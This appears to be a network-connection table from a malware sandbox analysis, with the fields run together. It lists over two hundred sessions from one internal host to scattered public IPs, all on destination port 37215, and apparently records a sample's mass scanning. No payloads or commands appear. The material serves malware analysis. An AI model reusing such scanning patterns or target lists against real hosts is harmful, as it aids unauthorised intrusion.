                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10238192.168.2.234131014.191.72.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10239192.168.2.2349086197.20.144.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10240192.168.2.235051241.10.70.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10241192.168.2.2339578157.56.246.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10242192.168.2.234539641.130.142.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10243192.168.2.234641641.37.10.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10244192.168.2.233329241.45.88.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10245192.168.2.2352416134.141.67.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10246192.168.2.234873041.52.58.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10247192.168.2.233661680.7.169.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10248192.168.2.235184041.180.140.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10249192.168.2.235610441.240.199.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10250192.168.2.235884840.237.151.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10251192.168.2.2360436206.99.198.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10252192.168.2.2335752157.5.107.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10253192.168.2.2334254157.98.33.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10254192.168.2.2343682156.125.179.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10255192.168.2.2342584157.161.213.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10256192.168.2.2343866108.106.46.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10257192.168.2.2357194197.92.35.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10258192.168.2.2343744192.67.124.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10259192.168.2.2347070157.49.72.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10260192.168.2.2337804157.248.108.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10261192.168.2.234159841.97.45.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10262192.168.2.2347274197.151.233.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10263192.168.2.2348936197.53.47.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10264192.168.2.2351392197.188.131.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10265192.168.2.2353554109.134.15.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10266192.168.2.2358722197.138.171.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10267192.168.2.2343088197.74.51.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10268192.168.2.2360192157.42.128.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10269192.168.2.233945220.195.9.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10270192.168.2.2347826197.56.83.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10271192.168.2.235275241.208.128.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10272192.168.2.2338414157.227.78.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10273192.168.2.2336792197.18.206.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10274192.168.2.2350422157.162.204.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10275192.168.2.235890441.214.199.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10276192.168.2.2344444157.108.175.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10277192.168.2.233674841.67.121.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10278192.168.2.23456082.146.208.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10279192.168.2.233491087.86.84.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10280192.168.2.2358062157.74.135.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10281192.168.2.235836624.218.215.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10282192.168.2.236049692.129.160.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10283192.168.2.2349730197.153.197.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10284192.168.2.2338562157.200.64.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10285192.168.2.234950841.172.156.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10286192.168.2.2351024154.105.24.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10287192.168.2.235876241.173.233.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10288192.168.2.2339218157.37.61.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10289192.168.2.235448293.161.156.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10290192.168.2.2355870157.241.196.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10291192.168.2.2340264157.31.87.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10292192.168.2.2347798197.247.245.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10293192.168.2.2347454106.133.72.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10294192.168.2.2337838107.213.115.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10295192.168.2.234467041.48.241.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10296192.168.2.2359368157.159.253.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10297192.168.2.2354940197.244.2.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10298192.168.2.2354600197.105.56.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10299192.168.2.2360190157.241.35.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10300192.168.2.235011841.140.229.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10301192.168.2.2335058197.221.70.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10302192.168.2.234710820.255.64.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10303192.168.2.2339158197.98.96.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10304192.168.2.235344699.157.239.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10305192.168.2.2339114157.43.209.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10306192.168.2.2338002157.97.114.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10307192.168.2.2351842157.214.216.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10308192.168.2.234848041.252.24.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10309192.168.2.2345982176.72.144.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10310192.168.2.2338634157.132.112.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10311192.168.2.2358442157.69.138.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10312192.168.2.2350338157.193.29.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10313192.168.2.2360944197.241.236.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10314192.168.2.233419641.18.249.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10315192.168.2.235485641.250.190.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10316192.168.2.233601841.164.79.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10317192.168.2.2342708134.200.171.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10318192.168.2.2357300157.214.20.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10319192.168.2.2357482197.120.0.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10320192.168.2.2352014157.64.74.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10321192.168.2.234273841.173.115.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10322192.168.2.234601247.163.185.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10323192.168.2.2336588157.96.97.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10324192.168.2.2336422157.93.17.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10325192.168.2.2335020157.151.153.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10326192.168.2.2357222157.175.8.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10327192.168.2.2352888157.242.215.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10328192.168.2.2349304115.86.4.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10329192.168.2.2336140209.47.146.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10330192.168.2.2349628166.211.149.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10331192.168.2.2353192207.47.65.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10332192.168.2.234230084.59.8.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10333192.168.2.234568641.214.113.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10334192.168.2.2356490165.241.6.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10335192.168.2.2354928200.200.206.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10336192.168.2.2354414157.138.166.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10337192.168.2.2336312157.90.74.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10338192.168.2.2334664197.181.63.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10339192.168.2.2345164157.147.138.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10340192.168.2.2344374197.17.165.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10341192.168.2.2360584136.75.61.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10342192.168.2.2334832187.28.128.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10343192.168.2.2350988157.31.52.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10344192.168.2.234860441.58.252.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10345192.168.2.235748641.20.194.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10346192.168.2.2348940157.220.58.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10347192.168.2.2340616197.39.78.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10348192.168.2.2356398197.122.17.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10349192.168.2.2360408157.120.122.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10350192.168.2.234691241.144.57.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10351192.168.2.2350360197.140.87.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10352192.168.2.2346716197.148.245.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10353192.168.2.2336794157.38.36.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10354192.168.2.2337824157.26.89.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10355192.168.2.2336646197.232.164.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10356192.168.2.233503231.62.188.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10357192.168.2.2355166157.41.202.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10358192.168.2.2347040197.213.121.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10359192.168.2.2351028157.250.170.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10360192.168.2.2354048197.43.11.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10361192.168.2.2356372197.103.70.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10362192.168.2.234434241.105.102.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10363192.168.2.235555841.33.182.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10364192.168.2.2341314191.206.234.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10365192.168.2.2338586157.8.28.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10366192.168.2.2349758157.104.64.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10367192.168.2.2348000197.156.204.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10368192.168.2.2360960157.80.174.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10369192.168.2.2335348182.22.167.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10370192.168.2.2337188197.228.1.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10371192.168.2.235166892.169.202.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10372192.168.2.2346674157.91.66.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10373192.168.2.235288041.195.27.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10374192.168.2.2338544157.184.119.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10375192.168.2.233840624.130.150.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10376192.168.2.2338678197.173.23.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10377192.168.2.2343320157.205.160.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10378192.168.2.2359632212.208.133.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10379192.168.2.2340244157.133.112.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10380192.168.2.234057841.168.186.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10381192.168.2.2359090157.74.180.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10382192.168.2.236023285.249.126.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10383192.168.2.234586841.209.196.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10384192.168.2.2340972157.68.91.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10385192.168.2.2359258157.198.28.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10386192.168.2.2341890157.89.245.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10387192.168.2.2356332157.219.98.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10388192.168.2.234209441.115.134.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10389192.168.2.233816841.63.13.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10390192.168.2.2344020197.185.44.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10391192.168.2.2340022197.160.124.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10392192.168.2.2351202139.172.106.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10393192.168.2.2357584165.4.11.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10394192.168.2.2358670157.96.249.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10395192.168.2.2348130197.196.5.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10396192.168.2.2333544157.146.25.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10397192.168.2.234227454.250.88.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10398192.168.2.2341172157.112.251.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10399192.168.2.235586841.203.233.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10400192.168.2.235514841.184.105.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10401192.168.2.2358856157.110.38.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10402192.168.2.2356996197.120.140.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10403192.168.2.23368342.15.54.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10404192.168.2.2347674157.204.201.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10405192.168.2.2343442157.217.227.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10406192.168.2.235312041.141.116.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10407192.168.2.2340510157.46.204.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10408192.168.2.235587468.252.81.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10409192.168.2.2360058157.20.156.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10410192.168.2.235832069.7.102.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10411192.168.2.2338906157.141.140.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10412192.168.2.233962872.6.174.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10413192.168.2.235356641.115.255.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10414192.168.2.2351876157.68.164.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10415192.168.2.2343378197.56.97.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10416192.168.2.2345420186.96.132.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10417192.168.2.2337084197.67.208.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10418192.168.2.2360438136.144.38.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10419192.168.2.233601241.68.60.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10420192.168.2.2353790176.39.154.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10421192.168.2.2360534157.72.252.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10422192.168.2.2338846157.164.222.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10423192.168.2.2346944157.236.207.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10424192.168.2.2332774157.101.226.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10425192.168.2.2333482157.232.56.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10426192.168.2.2341398157.53.158.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10427192.168.2.2358672223.75.189.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10428192.168.2.2360762197.132.85.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10429192.168.2.234309041.154.44.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10430192.168.2.2350652175.24.160.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10431192.168.2.2352644197.183.141.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10432192.168.2.235115241.142.139.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10433192.168.2.235157041.82.107.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10434192.168.2.2348246197.156.220.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10435192.168.2.2344784197.184.134.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10436192.168.2.2335356197.197.158.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10437192.168.2.234306041.209.26.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10438192.168.2.233408841.18.235.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10439192.168.2.2354548168.19.104.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10440192.168.2.235120078.30.159.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10441192.168.2.2336012197.78.1.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10442192.168.2.2341132197.198.132.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10443192.168.2.2360260197.75.207.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10444192.168.2.2359612197.71.59.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10445192.168.2.2336278197.209.5.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10446192.168.2.2340400157.129.214.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10447192.168.2.2340644200.219.92.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10448192.168.2.233450841.118.42.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10449192.168.2.2356854197.182.155.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10450192.168.2.2346956157.222.115.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10451192.168.2.2335924157.66.205.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10452192.168.2.2335864197.183.20.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10453192.168.2.235783047.160.89.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10454192.168.2.233926241.29.78.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10455192.168.2.2353900157.52.53.22537215
                                          TimestampBytes transferredDirectionData


